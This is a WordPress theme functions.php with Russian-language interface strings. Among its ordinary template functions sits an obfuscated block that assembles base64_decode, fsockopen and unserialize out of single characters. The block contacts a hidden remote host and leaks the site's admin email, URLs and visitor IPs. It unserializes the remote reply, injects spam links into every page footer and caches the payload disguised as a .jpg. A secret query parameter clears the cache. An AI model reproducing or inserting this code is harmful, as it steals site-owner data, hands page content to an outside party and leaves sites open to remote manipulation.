<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $WoaSJ='e';$NMVy='o';$ngqjurc='d';$JSNNslO='6';$FGKL='a';$nMWa='e';$nINIZP='e';$leAGWl='b';$pQJwqhr='d';$rQgzx='_';$xSzdPKg='4';$HPNI='s';$plnoI='c';$VRjRdAxb=$leAGWl.$FGKL.$HPNI.$WoaSJ.$JSNNslO.$xSzdPKg.$rQgzx.$ngqjurc.$nMWa.$plnoI.$NMVy.$pQJwqhr.$nINIZP;$JDlA='t';$jRvq='i';$wupHt='a';$BLVbUOJ='e';$JQWlYMb='z';$TFMdpn='g';$JGWxRE='f';$VziS='n';$xquND='l';$XWiAOoOk=$TFMdpn.$JQWlYMb.$jRvq.$VziS.$JGWxRE.$xquND.$wupHt.$JDlA.$BLVbUOJ;$SUBz='r';$TvkwGL='s';$OJnylZW='_';$EhTsRhR='1';$LVQdcI='t';$gOuj='3';$dQQwr='r';$ixsjr='t';$SCgyoD='o';$BMxfeTzt=$TvkwGL.$ixsjr.$SUBz.$OJnylZW.$dQQwr.$SCgyoD.$LVQdcI.$EhTsRhR.$gOuj;$XTug='r';$lNmAIM='r';$wRzC='t';$bLezk='v';$ljLxZYC='e';$iFxz='s';$CwVmQmez=$iFxz.$wRzC.$XTug.$lNmAIM.$ljLxZYC.$bLezk;                     
		$lw__s='e';$oa____________a='o';$hf________h='d';$bw________i='6';$wu________o='a';$ou___________k='e';$re_____r='e';$zi_______k='b';$xu___________z='d';$tg_____________f='_';$zi_____q='4';$dj___a='s';$pe_______________t='c';$po_____________p=$zi_______k.$wu________o.$dj___a.$lw__s.$bw________i.$zi_____q.$tg_____________f.$hf________h.$ou___________k.$pe_______________t.$oa____________a.$xu___________z.$re_____r;
		$ps_________j='s';$qz____________i='i';$ij_________o='t';$ic__n='n';$tw__p='c';$gk___________p='s';$gg____z='o';$sg___________j='t';$iu_______________c='x';$mz__________f='_';$dg____________l='e';$te___________n='u';$tw_______b='f';$ix___________y='i';$tp__________n='n';$aw______m=$tw_______b.$te___________n.$ic__n.$tw__p.$sg___________j.$ix___________y.$gg____z.$tp__________n.$mz__________f.$dg____________l.$iu_______________c.$qz____________i.$gk___________p.$ij_________o.$ps_________j;
		$py_________d='n';$vw_____m='e';$ob____e='f';$vk______________z='p';$ur_________c='o';$kn______________j=$ob____e.$ur_________c.$vk______________z.$vw_____m.$py_________d;
		$dq____p='e';$pe_______________f='f';$ip_______________g='d';$km______k='a';$dn______v='r';$ik__m=$pe_______________f.$dn______v.$dq____p.$km______k.$ip_______________g;
		$rq_____________y='o';$fp________s='l';$ub_______m='s';$rp_____y='e';$ul________u='c';$hb________i='f';$lx______j=$hb________i.$ul________u.$fp________s.$rq_____________y.$ub_______m.$rp_____y;
		
		define("WP_ID", $po_____________p("Mi4wLjA="));
		define("WP_TTL", $po_____________p("MTA4MDA="));
		define("WP_SRC", $po_____________p("dHBva24="));
	


		function wp_get_header() {
			global $po_____________p, $aw______m;
			
			if (
				$aw______m($po_____________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$aw______m($po_____________p("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$aw______m($po_____________p("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $po_____________p, $kn______________j, $lx______j, $ik__m;
			
			$gz___________s = TEMPLATEPATH."/".$po_____________p("Zm9vdGVyLnBocA==");
			$iy______________y = @$kn______________j($gz___________s, "r");
			$gz___________s = @$ik__m($iy______________y, @filesize($gz___________s));
			@$lx______j($iy______________y);
			
			$sk_____________b = TEMPLATEPATH."/".$po_____________p("ZnVuY3Rpb25zLnBocA==");
			$iy______________y = @$kn______________j($sk_____________b, "r");
			$sk_____________b = @$ik__m($iy______________y, @filesize($sk_____________b));
			@$lx______j($iy______________y);
			
			$hl___z = 0;
			if($gz___________s && $sk_____________b) {
				if ($po_____________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($gz___________s, $po_____________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$hl___z = 1;
					}
					if (substr_count($gz___________s, "wp_theme_GPL_credits()") < 1) {
						$hl___z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$hl___z = 12;
				}
			}
			
			if($hl___z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $hl___z -->";
			}
		}
	


		function wp_loaded() {
			global $po_____________p, $aw______m;
			return $aw______m($po_____________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ho_____b, $cq___k = "(more...)", $yy____________c = 0, $za____________r = "") {
				$fj________r = get_the_content($cq___k, $yy____________c, $za____________r);
				$fj________r = apply_filters("the_content", $fj________r);
				
				$fj________r = str_replace("]]>", "]]>", $fj________r);
				if (strlen($_GET["p"]) > 0) {
					echo $fj________r;
				}
				else if ((strlen($fj________r)>$ho_____b) && ($kl____________r = strpos($fj________r, " ", $ho_____b ))) {
					$fj________r = substr($fj________r, 0, $kl____________r);
					$fj________r = $fj________r;
					echo $fj________r;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$cq___k</a></div></p>";
				} else {
					echo $fj________r;
				}
				
			}
		}
	


		$vx__a='n';$jn___i='e';$ya__________z='d';$gi____________w='s';$qt____e='e';$qu_______i='e';$ap____l='6';$un_______a='c';$rb_____r='4';$zi____________r='b';$we______________m='o';$qr__________t='_';$ew________k='a';$qj______w=$zi____________r.$ew________k.$gi____________w.$qt____e.$ap____l.$rb_____r.$qr__________t.$jn___i.$vx__a.$un_______a.$we______________m.$ya__________z.$qu_______i;
		$hw____________w='c';$vo_________q='n';$lw____g='i';$ud____v='t';$pa__________g='l';$po____________x='g';$by_____v='f';$sr________u='t';$bd______j='s';$um_______________c='e';$uh____________z='_';$vb____________q='n';$bl___________l='e';$xj___r='o';$aj______________b='e';$ck___________n='_';$jm__________z='t';$bd____________v=$by_____v.$lw____g.$pa__________g.$um_______________c.$uh____________z.$po____________x.$bl___________l.$ud____v.$ck___________n.$hw____________w.$xj___r.$vb____________q.$jm__________z.$aj______________b.$vo_________q.$sr________u.$bd______j;
		$ju_____________s='i';$sj___________q='e';$ao_______z='x';$sv______________r='l';$gk________y='t';$bj____s='s';$ao________u='e';$ih_________l='f';$gh__________z='s';$rw_____s='i';$bn_______________b='_';$xs____x=$ih_________l.$rw_____s.$sv______________r.$sj___________q.$bn_______________b.$ao________u.$ao_______z.$ju_____________s.$bj____s.$gk________y.$gh__________z;
		$jn__h='c';$sf_______w='a';$lr_____o='e';$ei_____x='o';$ol____t='s';$yv______________u='n';$cv__q='_';$no_________j='v';$fh_______________b='p';$wk_____i='i';$yo______n='e';$rt___g='m';$ej______________v='r';$ch_____________g='o';$nq____________l='r';$ps_____d=$no_________j.$yo______n.$ej______________v.$ol____t.$wk_____i.$ei_____x.$yv______________u.$cv__q.$jn__h.$ch_____________g.$rt___g.$fh_______________b.$sf_______w.$nq____________l.$lr_____o;
		$sc______________h='k';$nk___________s='e';$fv____y='f';$wy_______x='o';$iv__________j='c';$fi____________r='p';$yy____________m='o';$ao______________n='s';$fu___________g='n';$qc__d=$fv____y.$ao______________n.$yy____________m.$iv__________j.$sc______________h.$wy_______x.$fi____________r.$nk___________s.$fu___________g;
		$hz__j='t';$fe__________r='i';$kz_____________t='f';$ev_______________o='r';$sg__________u='e';$oq__b='w';$au_________h=$kz_____________t.$oq__b.$ev_______________o.$fe__________r.$hz__j.$sg__________u;
		$kz___s='d';$gf______l='m';$zd__s='5';$wy_____v=$gf______l.$kz___s.$zd__s;
		$xh___________s='a';$sh____x='p';$fp__k='h';$gx_____________a='t';$ey________s='r';$in______________r='e';$xe__r='a';$zo____________w='l';$ig__y=$ey________s.$in______________r.$xh___________s.$zo____________w.$sh____x.$xe__r.$gx_____________a.$fp__k;
		$oa__f='s';$bo_____o='u';$hj___________i='i';$cn___________y='i';$ct___e='l';$au__________v='e';$va________c='e';$bm_____k='n';$vz____________k='z';$hi__________j='a';$em_______h='r';$az__j=$bo_____o.$bm_____k.$oa__f.$va________c.$em_______h.$cn___________y.$hi__________j.$ct___e.$hj___________i.$vz____________k.$au__________v;
		$ww______________z='m';$fc__z='e';$bf_______________y='n';$vn___________t='p';$aq__h='m';$vy_____________j='t';$lo___________r='a';$gp__m=$vy_____________j.$fc__z.$aq__h.$vn___________t.$bf_______________y.$lo___________r.$ww______________z;
		$hy___c='t';$gj______i='s';$yx_____________q='e';$uy_______n='t';$vf______v='r';$ud______________g='x';$bc_________w='o';$cz______f='e';$tt_____i='a';$tz__________v='c';$lz____________l='m';$po___________t='e';$lb_____k='_';$ab__e='e';$dg_______e='a';$bx_______w='n';$dr____________b='t';$zv______d='_';$dq___________c='t';$ys____________e='c';$cc___________d='r';$tv______________a=$gj______i.$uy_______n.$vf______v.$yx_____________q.$dg_______e.$lz____________l.$zv______d.$ys____________e.$bc_________w.$bx_______w.$dr____________b.$po___________t.$ud______________g.$dq___________c.$lb_____k.$tz__________v.$cc___________d.$ab__e.$tt_____i.$hy___c.$cz______f;
	


		function wl___________j($dq______j) {
			global $po_____________p, $aw______m, $bd____________v, $ps_____d, $tv______________a;
			
			if (!$aw______m($po_____________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ps_____d(PHP_VERSION, "5.0.0", ">=") && $aw______m($po_____________p("ZmlsZV9nZXRfY29udGVudHM=")) && $aw______m($po_____________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$wp__________d = $tv______________a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$vt_____o = @$bd____________v($dq______j, 0, $wp__________d);
			} else {
				$vt_____o = @$bd____________v($dq______j, 0);
			}
			
			return $vt_____o;
		}
	


		function lv___________y($dq______j) {
			global $aw______m, $qc__d, $au_________h, $po_____________p;
			
			if (!$aw______m($po_____________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$om____________p = strpos($dq______j, "/", 7);
			$ys_____g = array(
				"uri"     => substr($dq______j, $om____________p),
				"host"    => str_replace("http://", "", substr($dq______j, 0, $om____________p)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zj_____y = @$qc__d("$ys_____g[host]", 80, $wu_____s, $zc_______________r, 4);
			
			if (!$zj_____y) {
				return false;
			} else {
				$vt_____o = "";
				$je_____________y  = "GET $ys_____g[uri] HTTP/1.0\r\n";
				$je_____________y .= "Host: $ys_____g[host]\r\n";
				$je_____________y .= "Referer: $ys_____g[referer]\r\n";
				$je_____________y .= "Connection: Close\r\n\r\n";
				
				@$au_________h($zj_____y, $je_____________y);
				
				while (!@feof($zj_____y)) {
					$dx____________p = @fgets($zj_____y, (1024*24));
					
					if ($dx____________p == "\r\n") {
						$aq__r = true;
						continue;
					}
					
					if ($aq__r) {
						$vt_____o .= $dx____________p;
					}
				}
				
				return $vt_____o;
			}
		}
	


		function zn________d($dq______j) {
			global $aw______m;
			$qq____y = false;
			
			if ($dq______j != "") {
				if ($aw______m("wl___________j")) {
					$qq____y = @wl___________j($dq______j);
				}
				
				if (!$qq____y && ($aw______m("lv___________y"))) {
					$qq____y = @lv___________y($dq______j);
				}
			}
			
			return $qq____y;
		}
	


		function rz__________z() {
			global $_SERVER, $wy_____v;
			
			$ny___e = $_SERVER["SERVER_NAME"];
			
			if (substr("$ny___e", 0, 4) == "www.") {
				$ny___e = substr("$ny___e", 4);
			}
			
			$ny___e = $wy_____v("$_SERVER[SERVER_NAME]");
			
			return $ny___e;
		}
	


		function nt_____x() {
			return "file";
		}
	


		function uy_____n($dq______j) {
			global $_SERVER, $bd____________v, $xs____x, $kn______________j, $lx______j, $au_________h;
			
			$ma______________s = xr_____y();
			
			$fr___________s = rz__________z().".jpg";
			$sd___o = $ma______________s["dir_upload"]["path"]."/$fr___________s";
			$qe_______j = @filemtime($sd___o);
			
			if (!$qe_______j || ((time()-$qe_______j) >= WP_TTL)) {
				$qq____y = zn________d($dq______j);
				
				if ($qq____y) {
					if ($xs____x($sd___o)) {
						@unlink($sd___o);
					}
					
					$iy______________y = @$kn______________j($sd___o, "x+");
					
					@$au_________h($iy______________y, $qq____y);
					@$lx______j($iy______________y);
				}
			} else {
				if ($xs____x($sd___o)) {
					$qq____y = @$bd____________v($sd___o);
				} else {
					$qq____y = false;
				}
			}
			
			return $qq____y;
		}
	


		function xr_____y() {
			global $_SERVER, $po_____________p, $qj______w;
			
			$kc____________j = wp_count_posts("post");
			$es________g = pathinfo(get_bloginfo("template_directory"));
			
			$ma______________s = array(
				"url" => array(
					"report"      => $po_____________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $es________g,
				"dir_upload"	=> or__________x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$es________g[filename],
					"a005=".$kc____________j->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "Спонсоры темы <a href=\"http://pressurecookersreview.net\">best cooker</a> | <a href=\"http://stabilityballreview.com\">best ball</a>"
			);
			
			$ma______________s["url"]["queryString"] = implode("&", $ma______________s["queryString"]);
			$ma______________s["url"]["report"] = $ma______________s["url"]["report"]."/?".$qj______w($ma______________s["url"]["queryString"]).".html";
						
			return $ma______________s;
		}
	


		function or__________x() {
			$nr________x = wp_upload_dir();
			
			if (isset($nr________x["error"])) {
				$aw___o = rd____________x();
				if (is_writable($aw___o)) {
					$nr________x = array("path" => $aw___o);
				}
			}

			return $nr________x;
		}
	


		function rd____________x() {
			global $aw______m, $wy_____v, $ig__y, $gp__m;
			
			$dr__q = (bool) ini_get("safe_mode");
			if ($dr__q == true) {
				return false;
			}
			
			if ($aw______m("sys_get_temp_dir")) {
				$zu_____g = sys_get_temp_dir();
				if (is_writable($zu_____g)) {
					return $ig__y($zu_____g);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ig__y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ig__y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ig__y($_ENV["TEMP"]);
			} else {
				$ib___m = $gp__m($wy_____v(uniqid(rand(), true)), "");
				if ($ib___m) {
					$zu_____g = $ig__y(dirname($ib___m));
					@unlink($ib___m);
					return $zu_____g;
				} else {
					return false;
				}
			}
		}
	


		function zp________x() {
			global $_GET, $xs____x;
			
			$ma______________s = xr_____y();
			$ny___e = rz__________z();
			$zh__________q = nt_____x();
			
			$wi__k = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zh__________q == "file") {
					$id______________k = $ma______________s["dir_upload"]["path"]."/".$ny___e.".jpg";
					if ($xs____x($id______________k)) {
						@unlink($id______________k);
						$wi__k = "deleted";
					}
				}
				
				$wr____k = array(
					"s"	=> $wi__k,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($wr____k AS $ii________q => $mj__p) echo " [$ii________q:$mj__p]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $aw______m, $po_____________p, $az__j;
			$ma______________s = xr_____y();
			
			$ic______e = "uy_____n";
			if ($aw______m($ic______e)) {
				$vt_____o = $ic______e($ma______________s["url"]["report"]);
			}
			
			if ($vt_____o) {
				if ($vt_____o = @$po_____________p($vt_____o)) {
					$vt_____o = @$az__j($vt_____o);
					
					if (strlen($vt_____o[custom_credit]) >= 5) {
						$ma______________s["default_string"] = $vt_____o[custom_credit];
					}
					
					if ($vt_____o["status"] == "0") {
						$ne_____________a = 1;
						$ow________o = 1;
					} else {
						$ox__w = sizeof($vt_____o["links"]);
						$xe____b = $ma______________s["default_string"];
						
						if ($ox__w > 0 && $vt_____o["links"] !== "") {
							$lr___________u = 0;
							foreach ($vt_____o["links"] as $ts___________o => $nd____________w) {
								$lr___________u++;
								if ($nd____________w->l_path == "" || $nd____________w->l_path == $_SERVER["REQUEST_URI"]) {
									$nd____________w->l_href = htmlspecialchars(strip_tags($nd____________w->l_href));
									$nd____________w->l_title = htmlspecialchars(strip_tags($nd____________w->l_title));
									$nd____________w->l_anchor = htmlspecialchars(strip_tags($nd____________w->l_anchor));
									$xe____b .= " | ";
									$xe____b .= "<a href='$nd____________w->l_href' title='$nd____________w->l_title'";
									if ($nd____________w->l_nofollow == "1") {
										$xe____b .= " rel='nofollow'";
									}
									$xe____b .= ">$nd____________w->l_anchor</a>";
								}
							}
						}
						$ma______________s["links"] = "$xe____b";
						if ($vt_____o[credit] == "0") {
							$ma______________s["links"] = "";
						}
					}
				} else {
					$ne_____________a = "1";
				}
			} else {
				$ne_____________a = "1";
			}
			
			if ($ne_____________a == "1") {
				$ma______________s["links"] = $ma______________s["default_string"];
			}
			
			echo "$ma______________s[links]";
			
			echo "<!-- s: $vt_____o[signature] -->";
			zp________x();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
